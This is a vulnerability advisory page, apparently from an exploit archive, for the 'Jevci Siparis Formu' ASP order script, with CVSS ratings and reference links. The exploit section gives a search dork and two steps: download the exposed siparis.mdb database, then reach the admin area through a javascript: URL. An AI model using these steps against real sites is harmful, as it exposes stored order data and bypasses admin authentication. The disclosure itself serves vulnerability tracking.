Jevci Siparis Formu Scripti => Guestbook DB Vulnerability

2010.03.17
Credit: indoushka
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

======================================================================================== | # Title : Jevci Siparis Formu Scripti => Guestbook DB Vulnerability | # Author : indoushka | # email : indoushka@hotmail.com | # Home : www.sec-war.com | # Web Site : http://scripti.org/i/jevci_siparis_formu.zip | # Dork : Jevci Siparis Formu | # Tested on: windows SP2 Franais V.(Pnx2 2.0) + Lunix Franais v.(9.4 Ubuntu) | # Bug : Mullti ====================== Exploit By indoushka ================================= # Exploit : 1- http://127.0.0.1/jevci_siparis_formu/siparis.mdb 2- put this code to login in admin area javascript:pencere('siparis_yonetim_default.asp') Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * n2n ========================================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * www.securitywall.org * r1z (www.sec-r1z.com) www.securityreason.com * www.packetstormsecurity.org * www.m-y.cc * Cyb3r IntRue (avengers team) www.hacker.ps * www.no-exploit.com * www.bawassil.com * www.xp10.me * www.mormoroth.net www.alkrsan.net * www.kadmiwe.net * www.arhack.net * D4NB4R http://www.ilegalintrusion.net/foro/ --------------------------------------------------------------------------------------------------------------

References:

http://xforce.iss.net/xforce/xfdb/56794
http://secunia.com/advisories/38893
http://packetstormsecurity.org/1003-exploits/jevci-disclose.txt
http://osvdb.org/62843


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top